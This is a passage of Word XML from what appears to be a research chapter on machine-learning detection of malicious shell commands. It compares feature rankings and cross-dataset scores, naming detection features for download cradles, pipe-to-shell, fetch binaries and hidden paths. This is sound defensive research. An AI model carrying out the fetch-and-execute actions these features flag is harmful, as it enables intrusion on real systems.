        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_hidden_path</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>special_ratio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>len_tokens</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>One feature is common to both top fives</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_abs_paths</w:t>
      </w:r>
      <w:r>
        <w:t>); three are common to</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">both top tens. The largest individual moves are </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_dev_null</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (consensus rank</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.3 → 30.7), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>head_is_shell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (30.7 → 10.3), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_url</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (33.3 → 15.0) and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_fetch_bin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (19.3 → 3.0) — and each is interpretable. Dataset 1's attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>suppress output and invoke shells because that is what published payloads do;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Dataset 2's attacks fetch things, because a real intrusion's first act after</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>gaining a shell is to pull down a second stage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>What does transfer, and why</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The picture is not uniformly negative, and the exceptions are the informative</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>part. Features that keep both sign and rough magnitude across corpora:</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feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dataset 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dataset 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>digit_ratio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>δ +0.238</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>δ +0.234</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>mean_token_len</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>δ +0.161</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>δ +0.198</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n_pipes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>δ −0.166</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>δ −0.107</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_lotl_bin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>OR 0.62</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>OR 0.50</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_pipe_to_shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>OR 8.65</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>OR 8.68</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_hex_escape</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>OR 22.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>OR 11.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_hidden_path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>OR 4.36</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>OR 3.99</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>has_fetch_bin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>OR 5.56</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>OR 7.96</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The pattern is consistent and it is the chapter's central claim. What survives a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">change of corpus is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>encoding artefacts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>digit_ratio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_hex_escape</w:t>
      </w:r>
      <w:r>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>structural necessities</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_pipe_to_shell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — a pipe terminating in an</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">interpreter is a download cradle in any corpus; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_hidden_path</w:t>
      </w:r>
      <w:r>
        <w:t>), and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>stable negatives</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_pipes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_lotl_bin</w:t>
      </w:r>
      <w:r>
        <w:t>, both reliably benign in both</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>places). What does not survive is anything derived from **size, verbosity or</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>vocabulary** — precisely the properties that a corpus's authors, rather than its</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>attackers, determine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>The measured consequence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Training on one corpus and testing on the other gives the following, against a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>do-nothing floor of 0.400 in both directions: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model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>D1→D1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>D1→D2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>D2→D2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>D2→D1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>xgboost_hybrid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.876</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.532</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.848</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.276</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>cnn1d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.860</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.541</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.838</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1814"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.359</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
